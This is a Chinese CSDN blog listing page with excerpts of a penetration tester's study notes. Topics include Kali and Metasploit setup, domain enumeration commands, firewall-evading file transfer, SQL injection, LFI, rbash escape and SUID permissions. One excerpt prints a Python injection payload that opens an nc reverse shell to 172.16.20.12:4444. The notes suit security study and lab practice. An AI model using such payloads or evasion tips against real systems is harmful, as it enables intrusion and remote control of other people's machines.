leoriclee-CSDN博客

原创 sublime text3控制台输出中文乱码问题

首先新建Build System：Tools > Build System > Build New System在新建的文件中用以下代码替换{“cmd”: [“C:/Program Files/Python37/python3.exe”,"-u","$file"],“file_regex”: “1File "(…?)”, line ([0-9]*)",“selector”: “source.python”,“encoding”: “cp936”}然后保存此文件，命名为 Acpha

2021-05-13 14:56:28 543

原创 python violent chapter4

记录这章需要的python和资源pip install geoip2 新的解析数据库的类库，针对geolite2_city.mmdb文件pip install pygeoip 书中用的是这个库，针对GeoLiteCity.dat文件

2021-05-12 16:37:37 89

原创 python2和python3共存时解决的问题

安装python2和python3、设置环境变量简单的就不说了，问题一：安装python2.7.18时，发现没有scripts目录，查看资料发现需要下载ez_setup.py下载地址：https://pypi.org/project/ez_setup/#files问题二：解压后进入，ez_setup目录下使用python2 ez_setup.py 安装，发现没有SSL,报错：HTTPError: HTTP Error 403: SSL is required于是根据报错信息单独下载依赖包

2021-05-11 22:21:17 169

原创 smbclient连smb服务报错protocol negotiation failed: NT_STATUS_IO_TIMEOUT

连xp smb的时候报错：protocol negotiation failed: NT_STATUS_IO_TIMEOUT解决方法：在/etc/samba/smb.conf的global section添加下面的配置client min protocol = NT1问题解决，或者在命令中添加选项smbclient -N //10.10.10.125/Reports --option=‘client min protocol=NT1’...

2021-04-26 11:03:01 1725

原创 kali 2020-1-20升级metasploit-framework记

kali2020-01-20用了也有一段时间了，今天学习python要用到msf，心血来潮想升级一下metasploit-framework，说（忘）干（记）就（镜）干（像）apt-get install metasploit-frameworkmsf升级很顺利，结果再查看版本时报错，WTF不想重新复制备份的VM，所以只好硬头皮修复问题，于是就有了这篇作品首先根据报错提示，执行bundle install，咣当，又报错了然后好吧，不能用root，那就用小kali吧，再报错找不到Gemfil

2021-04-25 15:01:18 537

原创收集域信息

收集域信息net view //获取当前组的计算机名字net view /domain //查看所有域ping -n 1 [组计算机明] -4 //从计算机名获取IP 地址net user /domain //查看域中的用户名net group /domain //查看域组名称net group “Domain Admins” /domain //查询管理员net group “Domain controllers” /domain //查询域控

2020-09-28 15:26:11 135

原创让局域网内机器可以通过防火墙访问其他机器的指定端口

在控制面板中打开防火墙，点击高级设置右键入站规则，点击新建规则，点选端口，下一步在端口页面按需要选择TCP或UDP端口，输入框中输入端口号，下一步如果不止有IPSEC连接选择允许连接，下一步选择要落实在哪个网络设置名称即可...

2020-07-31 11:45:46 1294

转载渗透测试中的文件传输技巧

在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输，本文列出了多种利用操作系统默认自带的工具进行文件传输的方法。搭建 HTTP serverPythonpython2:python -m SimpleHTTPServer 1337以上命令会在当前目录启动 HTTP 服务，端口为 1337python3:python -m http.server 1337以上命令会在当前目录启动 HTTP 服务，端口为 1337PHP 5

2020-07-29 16:06:46 613

原创 ODAT 查询数据库漏洞

ODAT (Oracle Database Attacking Tool)是一款开源安全渗透测试工具，可以帮助安全测试人员对Oracle数据库远程进行安全测试。下载地址：https://github.com/quentinhardy/odat/releases/使用案例：你具有一个Oracle数据库的远程连接权限，想要获取真实的SIDS和登陆验证信息以连接数据库。你有一个合法的Oracle账户，想要提升权限，比如SYSDBA你有一个合法的Oracle账户，想要在DB所在的主机上执行系统命令。特

2020-07-22 18:58:33 411

原创 oracle查询用户当前角色

USER_ROLE_PRIVS 当前用户授予的角色。栏数据类型描述USERNAME VARCHAR2（30）用户名或公共 GRANTED_ROLE VARCHAR2（30）授予用户角色的名称 ADMIN_OPTION VARCHAR2（3）指示是否授予与管理OPTION（YES）或不（NO） DEFAULT_ROLE VARCHAR2（3）指示作用是否为指定用户的默认角色（YES）或不（NO） OS_GRANTED .

2020-07-22 17:43:55 600

原创 kali 2020.1安裝pip3

pip3(python3)安装wget https://bootstrap.pypa.io/get-pip.pypython3 get-pip.pypip -V

2020-07-22 15:30:21 735

转载 SQLI类型

根据用于数据检索的传输信道，SQLi可分为三个独立的类别：inband, inference（推理）和out-of-band。Inband技术使用攻击者和有漏洞的Web应用程序之间现有的渠道来提取数据。通常该通道是标准的Web服务器响应。它的成员union技术使用现有的web页面输出恶意SQL查询的执行结果，而error-based技术则引发特定的恶意SQL查询的执行结果的DBMS的错误消息。相反的，在Inference技术中，攻击者通过应用程序表现的差异来推断数据的值。Inference技术能够逐位

2020-07-21 14:08:37 836

原创 impacket的版本号和python3的impacket版本号冲突解决

查看/usr/local/bin/smbserver.py里面指向的是一个新版本的impacket，而python自带的impacket较旧解决：在impacket目录下执行pip install . 就可以更新/usr/local/bin/下的smbserver.py了

2020-07-09 14:59:43 629

转载 rbash逃逸

枚举Linux环境枚举是本文中最重要的内容。我们需要通过枚举Linux环境来考察可以绕过rbash做哪些事情。我们需要枚举：1）首先，我们必须检查有哪些可用的命令，如cd / ls / echo等。2）我们必须检查诸如>、>>、<、|之类的操作符。3）我们需要检查可用的编程语言，如perl、ruby、python等。4）我们能够以root身份运行哪些命令（sudo -l）。5）检查具有SUID权限的文件或命令。6）必须检查当前所用的shell，具体命令为：echo $

2020-07-02 10:50:08 516

转载 Linux程序的常用保护机制

操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安全风险，包括DEP、ASLR等。在编写漏洞利用代码的时候，需要特别注意目标进程是否开启了DEP（Linux下对应NX）、ASLR（Linux下对应PIE）等机制，例如存在DEP（NX）的话就不能直接执行栈上的数据，存在ASLR的话各个系统调用的地址就是随机化的。一、checksecchecksec是一个脚本软件，也就是用脚本写的一个文件，不到2000行，可用来学习shell。源码参见http://www.trapkit.de/tools

2020-06-28 14:29:24 2701 1

原创 pyc文件

pyc是一种二进制文件，是由py文件经过编译后，生成的文件，是一种byte code，py文件变成pyc文件后，运行加载的速度会有所提高；另一反面，把py文件编译为pyc文件，从而可以实现部分的源码隐藏，保证了python做商业化软件时的安全性...

2020-06-22 15:11:01 191

转载 Linux下使用Python连接Oracle 报cx_Oracle.DatabaseError: DPI-1047

在Linux上使用python运行数据库脚本的时候报：cx_Oracle.DatabaseError: DPI-1047: 64-bit Oracle Client library cannot be loaded解决方法这个导致这个问题的原因是本机的Python2.7是64位的，而数据库用了32位的instantclient-basic，所以要把instantclient-basic的版本更新为64位的以下是按照官网文档操作的，自测没有问题.下载instantclient-basic的RPM包或者Z

2020-06-05 14:34:10 971

原创 icacls输出详解

icacls preserves the canonical order of ACE entries as:Explicit denialsExplicit grantsInherited denialsInherited grantsPerm is a permission mask that can be specified in one of the following forms:A sequence of simple rights:F (full access)M (modif

2020-06-04 15:22:23 1240

原创 Hackthebox初体验

在kali下装置这几个源apt-get install network-manager-openvpnapt-get install network-manager-openvpn-gnomeapt-get install network-manager-pptpapt-get install network-manager-pptp-gnomeapt-get install netwo...

2020-05-08 09:54:31 1276

原创安装frida

在kali安装frida之前要先安装pipcurl https://bootstrap.pypa.io/get-pip.py -o get-pip.py这里要注意，需要显式指定使用python3，因为kali已经安装了python2.x和3.x版本python3 get-pip.py安装fridapip install frida-tools...

2020-04-02 10:56:19 468

原创使用公钥登录ssh

私钥登录，目标主机上保存一份公钥，需要登录到该主机上时使用私钥即可登录，可以免去输入密码的麻烦。生成密钥对使用ftp登录对方机器创建.ssh目录上传authorized_keys，由于执行ftp登录的目录是己方的.ssh目录，所以可以直接put authorized_keys，否则需要使用lcd，参考ftp命令大全详解上传后就可以使用密钥登录了，如果之前曾经创建过密钥对，需要重新生成，...

2020-03-27 14:05:02 519

原创 openbsd netcat的使用方法

etc’ and import(“os”).system(“rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| nc 172.16.20.12 4444 > /tmp/f”) and’

2020-03-23 17:54:07 1115

原创 LFI

主要涉及到的函数include(),require()、include_once(),require_once()magic_quotes_gpc()、allow_url_fopen()、allow_url_include()、move_uploaded_file() 、readfile() file()、and file_get_contents()、upload_tmp_dir()、pos...

2020-03-20 17:25:27 156

原创 linux特殊权限

在linux权限当中，除了rwx三种基本权限之外，还有三种特殊权限，SUID、SGID、SBIT三种,例如以下:SUID即SET UID权限，其只出现于二进制文件拥有者执行权限x上，标注为s，其作用是如果执行者有其对应执行权限x，那么在程序运行过程中，程序将获得程序拥有者的权限举个例子:我们可以看到 passwd命令有s权限，且owner为root，其他用户有x执行权限，而/etc/sh...

2020-03-19 17:47:02 206

原创 passwd格式

Passwd文件由许多条记录组成，每条记录占一行，记录了一个用户帐号的所有信息。每条记录由7个字段组成，字段间用冒号“：”隔开，其格式如下：username:password:User ID:Group ID:comment:home directory:shell...

2020-03-19 16:20:00 419

原创模拟终端设备

有了（疑似）root密码怎么办？你一定想ssh登陆。然而ssh很可能禁止root登陆，或是防火墙规则将你排除在外了。返回来想，我们不是有一个低权shell了吗？找个办法再上面“输入”密码就好了。显然，直接在低权shell里面用sudo是不奏效的。这是因为出于安全考虑，linux要求用户必须从终端设备（tty）中输入密码，而不是标准输入（stdin）。换句话说，sudo在你输入密码的时候本质上是读取...

2020-03-19 14:41:32 328